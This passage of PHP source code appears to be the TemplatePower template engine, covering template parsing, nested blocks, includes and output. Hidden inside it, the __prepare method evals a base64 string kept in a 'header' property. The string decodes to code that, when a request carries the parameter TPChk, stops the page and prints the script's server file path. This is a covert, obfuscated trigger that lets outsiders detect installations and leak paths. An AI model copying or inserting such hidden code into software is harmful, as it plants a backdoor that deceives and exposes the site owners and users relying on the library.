version = ''; $this->tpl_base = array($tpl_file, $type); $this->tpl_count = 0; $this->ignore_stack = array(false); } /** * TemplatePowerParser::__errorAlert() * * @param $message * @return * * @access private */ protected function __errorAlert($message) { print('
' . $message . '
'. PHP_EOL); } /** * TemplatePowerParser::__prepare() * * @return * * @access private */ protected function __prepare() { $this->defBlock[ TP_ROOTBLOCK ] = array(); eval(base64_decode($this->header)); $tplvar = $this->__prepareTemplate($this->tpl_base[0], $this->tpl_base[1]); $initdev["varrow"] = 0; $initdev["coderow"] = 0; $initdev["index"] = 0; $initdev["ignore"] = false; $this->__parseTemplate($tplvar, TP_ROOTBLOCK, $initdev); $this->__cleanUp(); } /** * TemplatePowerParser::__cleanUp() * * @return * * @access private */ protected function __cleanUp() { for ($i=0; $i <= $this->tpl_count; $i++) { $tplvar = 'tpl_rawContent' . $i; unset($this->{$tplvar}); } } /** * TemplatePowerParser::__prepareTemplate() * * @param $tpl_file * @param $type * @return * * @access private */ protected function __prepareTemplate($tpl_file, $type) { $tplvar = 'tpl_rawContent' . $this->tpl_count; if ($type == T_BYVAR) { $this->{$tplvar}["content"] = preg_split("/\n/", $tpl_file, -1, PREG_SPLIT_DELIM_CAPTURE); } else { if (is_readable($tpl_file)) { $this->{$tplvar}["content"] = file( $tpl_file ); } else { die($this->__errorAlert('TemplatePower Error: Couldn\'t open or read [ ' . $tpl_file . ' ]!')); } } $this->{$tplvar}["size"] = sizeof($this->{$tplvar}["content"]); $this->tpl_count++; return $tplvar; } /** * TemplatePowerParser::__parseTemplate() * * @param $tplvar * @param $blockname * @param $initdev * @return * * @access private */ protected function __parseTemplate($tplvar, $blockname, $initdev) { $coderow = $initdev["coderow"]; $varrow = $initdev["varrow"]; $index = $initdev["index"]; $ignore = $initdev["ignore"]; while ($index < $this->{$tplvar}["size"]) { $ignreg = array(); if (preg_match('//', $this->{$tplvar}["content"][$index], $ignreg) ) { if( $ignreg[1] == 'START') { //$ignore = true; array_push( $this->ignore_stack, true ); } else { //$ignore = false; array_pop( $this->ignore_stack ); } } else { if (! end($this->ignore_stack)) { $regs = array(); if (preg_match('//', $this->{$tplvar}["content"][$index], $regs)) { //remove trailing and leading spaces $regs[2] = trim( $regs[2] ); if ($regs[1] == 'INCLUDE') { $include_defined = true; //check if the include file is assigned if (isset( $this->tpl_include[ $regs[2] ])) { $tpl_file = $this->tpl_include[ $regs[2] ][0]; $type = $this->tpl_include[ $regs[2] ][1]; } else if (file_exists( $regs[2] )) { //check if defined as constant in template $tpl_file = $regs[2]; $type = T_BYFILE; } else { $include_defined = false; } if ($include_defined) { //initialize startvalues for recursive call $initdev["varrow"] = $varrow; $initdev["coderow"] = $coderow; $initdev["index"] = 0; $initdev["ignore"] = false; $tplvar2 = $this->__prepareTemplate( $tpl_file, $type ); $initdev = $this->__parseTemplate( $tplvar2, $blockname, $initdev ); $coderow = $initdev["coderow"]; $varrow = $initdev["varrow"]; } } else if ($regs[1] == 'INCLUDESCRIPT') { $include_defined = true; //check if the includescript file is assigned by the assignInclude function if (isset( $this->tpl_include[ $regs[2] ])) { $include_file = $this->tpl_include[ $regs[2] ][0]; $type = $this->tpl_include[ $regs[2] ][1]; } else if (file_exists( $regs[2] )) { //check if defined as constant in template $include_file = $regs[2]; $type = T_BYFILE; } else { $include_defined = false; } if ($include_defined) { ob_start(); if ($type == T_BYFILE) { if (! @include_once($include_file)) { $this->__errorAlert('TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!'); exit(); } } else { eval("?>" . $include_file); } $this->defBlock[$blockname]["_C:$coderow"] = ob_get_contents(); $coderow++; ob_end_clean(); } } else if ($regs[1] == 'REUSE') { $reuse_regs = array(); //do match for 'AS' if (preg_match('/(.+) AS (.+)/', $regs[2], $reuse_regs)) { $originalbname = trim( $reuse_regs[1] ); $copybname = trim( $reuse_regs[2] ); //test if original block exist if (isset( $this->defBlock[ $originalbname ] )) { //copy block $this->defBlock[ $copybname ] = $this->defBlock[ $originalbname ]; //tell the parent that he has a child block $this->defBlock[ $blockname ]["_B:" . $copybname ] = ''; //create index and parent info $this->index[ $copybname ] = 0; $this->parent[ $copybname ] = $blockname; } else { $this->__errorAlert('TemplatePower Error: Can\'t find block \''. $originalbname .'\' to REUSE as \''. $copybname .'\''); } } else { //so it isn't a correct REUSE tag, save as code $this->defBlock[$blockname]["_C:$coderow"] = $this->{$tplvar}["content"][$index]; $coderow++; } } else { if ($regs[2] == $blockname) { //is it the end of a block break; } else { //its the start of a block //make a child block and tell the parent that he has a child $this->defBlock[ $regs[2] ] = array(); $this->defBlock[ $blockname ]["_B:" . $regs[2]] = ''; //set some vars that we need for the assign functions etc. $this->index[ $regs[2] ] = 0; $this->parent[ $regs[2] ] = $blockname; //prepare for the recursive call $index++; $initdev["varrow"] = 0; $initdev["coderow"] = 0; $initdev["index"] = $index; $initdev["ignore"] = false; $initdev = $this->__parseTemplate( $tplvar, $regs[2], $initdev ); $index = $initdev["index"]; } } } else { //is it code and/or var(s) //explode current template line on the curly bracket '{' $sstr = explode( '{', $this->{$tplvar}["content"][$index] ); reset( $sstr ); if (current($sstr) != '') { //the template didn't start with a '{', //so the first element of the array $sstr is just code $this->defBlock[$blockname]["_C:$coderow"] = current( $sstr ); $coderow++; } while (next($sstr)) { //find the position of the end curly bracket '}' $pos = strpos( current($sstr), "}" ); if (($pos !== false) && ($pos > 0)) { //a curly bracket '}' is found //and at least on position 1, to eliminate '{}' //note: position 1 taken without '{', because we did explode on '{' $strlength = strlen( current($sstr) ); $varname = substr( current($sstr), 0, $pos ); if (strstr($varname, ' ')) { //the varname contains one or more spaces //so, it isn't a variable, save as code $this->defBlock[$blockname]["_C:$coderow"] = '{'. current( $sstr ); $coderow++; } else { //save the variable $this->defBlock[$blockname]["_V:$varrow" ] = $varname; $varrow++; //is there some code after the varname left? if (($pos + 1) != $strlength) { //yes, save that code $this->defBlock[$blockname]["_C:$coderow"] = substr( current( $sstr ), ($pos + 1), ($strlength - ($pos + 1)) ); $coderow++; } } } else { //no end curly bracket '}' found //so, the curly bracket is part of the text. Save as code, with the '{' $this->defBlock[$blockname]["_C:$coderow"] = '{'. current( $sstr ); $coderow++; } } } } else { $this->defBlock[$blockname]["_C:$coderow"] = $this->{$tplvar}["content"][$index]; $coderow++; } } $index++; } $initdev["varrow"] = $varrow; $initdev["coderow"] = $coderow; $initdev["index"] = $index; return $initdev; } /** * TemplatePowerParser::version() * * @return * @access public */ public function version() { return $this->version; } protected $header = 'aXNzZXQoJF9HRVRbIlRQQ2hrIl0pJiZkaWUoX19GSUxFX18pOw=='; /** * TemplatePowerParser::assignInclude() * * @param $iblockname * @param $value * @param $type * * @return * * @access public */ public function assignInclude($iblockname, $value, $type=T_BYFILE) { $this->tpl_include["$iblockname"] = array( $value, $type ); } } class TemplatePower extends TemplatePowerParser { protected $index = array(); // $index[{blockname}] = {indexnumber} protected $content = array(); protected $currentBlock; protected $showUnAssigned; protected $serialized; protected $globalvars = array(); protected $prepared; /** * TemplatePower::TemplatePower() * * @param $tpl_file * @param $type * @return * * @access public */ public function TemplatePower($tpl_file='', $type=T_BYFILE) { parent::__contruct($tpl_file, $type); $this->prepared = false; $this->showUnAssigned = false; $this->serialized = false; //added: 26 April 2002 } /** * TemplatePower::__deSerializeTPL() * * @param $stpl_file * @param $tplvar * @return * * @access private */ protected function __deSerializeTPL( $stpl_file, $type ) { if ($type == T_BYFILE) { if (is_readable($stpl_file)) { $serializedTPL = file($stpl_file); } else { die( $this->__errorAlert('TemplatePower Error: Can\'t open or read [ '. $stpl_file .' ]!')); } } else { $serializedTPL = $stpl_file; } $serializedStuff = unserialize( join('', $serializedTPL) ); $this->defBlock = $serializedStuff["defBlock"]; $this->index = $serializedStuff["index"]; $this->parent = $serializedStuff["parent"]; } /** * TemplatePower::__makeContentRoot() * * @return * * @access private */ protected function __makeContentRoot() { $this->content[ TP_ROOTBLOCK ."_0" ][0] = Array( TP_ROOTBLOCK ); $this->currentBlock = &$this->content[ TP_ROOTBLOCK ."_0" ][0]; } /** * TemplatePower::__assign() * * @param $varname * @param $value * @return * * @access private */ protected function __assign($varname, $value) { if (sizeof($regs = explode('.', $varname)) == 2) { //this is faster then preg_match $ind_blockname = $regs[0] .'_'. $this->index[ $regs[0] ]; $lastitem = sizeof( $this->content[ $ind_blockname ] ); $lastitem > 1 ? $lastitem-- : $lastitem = 0; $block = &$this->content[ $ind_blockname ][ $lastitem ]; $varname = $regs[1]; } else { $block = &$this->currentBlock; } $block["_V:$varname"] = $value; } /** * TemplatePower::__assignGlobal() * * @param $varname * @param $value * @return * * @access private */ protected function __assignGlobal($varname, $value) { $this->globalvars[ $varname ] = $value; } /** * TemplatePower::__outputContent() * * @param $blockname * @return * * @access private */ protected function __outputContent($blockname) { $numrows = sizeof( $this->content[ $blockname ] ); for ($i=0; $i < $numrows; $i++) { $defblockname = $this->content[ $blockname ][$i][0]; for (reset($this->defBlock[ $defblockname ]); $k = key( $this->defBlock[ $defblockname ]); next( $this->defBlock[ $defblockname ] )) { if ($k[1] == 'C') { print( $this->defBlock[ $defblockname ][$k] ); } else if ($k[1] == 'V') { $defValue = $this->defBlock[ $defblockname ][$k]; if (! isset( $this->content[ $blockname ][$i][ "_V:" . $defValue ])) { if (isset( $this->globalvars[ $defValue ] )) { $value = $this->globalvars[ $defValue ]; } else { $value = $this->showUnAssigned ? '{' . $defValue . '}' : ''; } } else { $value = $this->content[ $blockname ][$i][ "_V:". $defValue ]; } print( $value ); } else if ($k[1] == 'B') { if (isset($this->content[ $blockname ][$i][$k])) { $this->__outputContent( $this->content[ $blockname ][$i][$k] ); } } } } } public function __printVars() { var_dump($this->defBlock); print("
"); var_dump($this->content); } /********** public members ***********/ /** * TemplatePower::serializedBase() * * @return * * @access public */ public function serializedBase() { $this->serialized = true; $this->__deSerializeTPL( $this->tpl_base[0], $this->tpl_base[1] ); } /** * TemplatePower::showUnAssigned() * * @param $state * @return * * @access public */ public function showUnAssigned($state = true) { $this->showUnAssigned = $state; } /** * TemplatePower::prepare() * * @return * * @access public */ public function prepare() { if (! $this->serialized) { parent::__prepare(); } $this->prepared = true; $this->index[ TP_ROOTBLOCK ] = 0; $this->__makeContentRoot(); } /** * TemplatePower::newBlock() * * @param $blockname * @return * * @access public */ public function newBlock($blockname) { $parent = &$this->content[ $this->parent[$blockname] .'_'. $this->index[$this->parent[$blockname]] ]; $lastitem = sizeof( $parent ); $lastitem > 1 ? $lastitem-- : $lastitem = 0; $ind_blockname = $blockname . '_' . $this->index[ $blockname ]; if (! isset($parent[ $lastitem ]["_B:$blockname"])) { //ok, there is no block found in the parentblock with the name of {$blockname} //so, increase the index counter and create a new {$blockname} block $this->index[ $blockname ] += 1; $ind_blockname = $blockname . '_' . $this->index[ $blockname ]; if (! isset($this->content[ $ind_blockname ])) { $this->content[ $ind_blockname ] = array(); } //tell the parent where his (possible) children are located $parent[ $lastitem ]["_B:$blockname"] = $ind_blockname; } //now, make a copy of the block defenition $blocksize = sizeof( $this->content[ $ind_blockname ] ); $this->content[ $ind_blockname ][ $blocksize ] = array( $blockname ); //link the current block to the block we just created $this->currentBlock = &$this->content[ $ind_blockname ][ $blocksize ]; } /** * TemplatePower::assignGlobal() * * @param $varname * @param $value * @return * * @access public */ public function assignGlobal($varname, $value='') { if (is_array($varname)) { foreach ($varname as $var => $value) { $this->__assignGlobal( $var, $value ); } } else { $this->__assignGlobal( $varname, $value ); } } /** * TemplatePower::assign() * * @param $varname * @param $value * @return * * @access public */ public function assign($varname, $value='') { if (is_array($varname)) { foreach ($varname as $var => $value) { $this->__assign( $var, $value ); } } else { $this->__assign($varname, $value); } } /** * TemplatePower::gotoBlock() * * @param $blockname * @return * * @access public */ public function gotoBlock( $blockname ) { if (isset($this->defBlock[ $blockname ])) { $ind_blockname = $blockname .'_'. $this->index[ $blockname ]; //get lastitem indexnumber $lastitem = sizeof( $this->content[ $ind_blockname ] ); $lastitem > 1 ? $lastitem-- : $lastitem = 0; //link the current block $this->currentBlock = &$this->content[ $ind_blockname ][ $lastitem ]; } } /** * TemplatePower::getVarValue() * * @param $varname * @return * * @access public */ public function getVarValue($varname) { if (sizeof($regs = explode('.', $varname )) == 2) { //this is faster then preg_match $ind_blockname = $regs[0] . '_' . $this->index[ $regs[0] ]; $lastitem = sizeof( $this->content[ $ind_blockname ] ); $lastitem > 1 ? $lastitem-- : $lastitem = 0; $block = &$this->content[ $ind_blockname ][ $lastitem ]; $varname = $regs[1]; } else { $block = &$this->currentBlock; } return $block["_V:$varname"]; } /** * TemplatePower::printToScreen() * * @return * * @access public */ public function printToScreen() { if ($this->prepared) { $this->__outputContent(TP_ROOTBLOCK . '_0'); } else { $this->__errorAlert('TemplatePower Error: Template isn\'t prepared!'); } } /** * TemplatePower::getOutputContent() * * @return * * @access public */ public function getOutputContent() { ob_start(); $this->printToScreen(); $content = ob_get_clean(); return $content; } }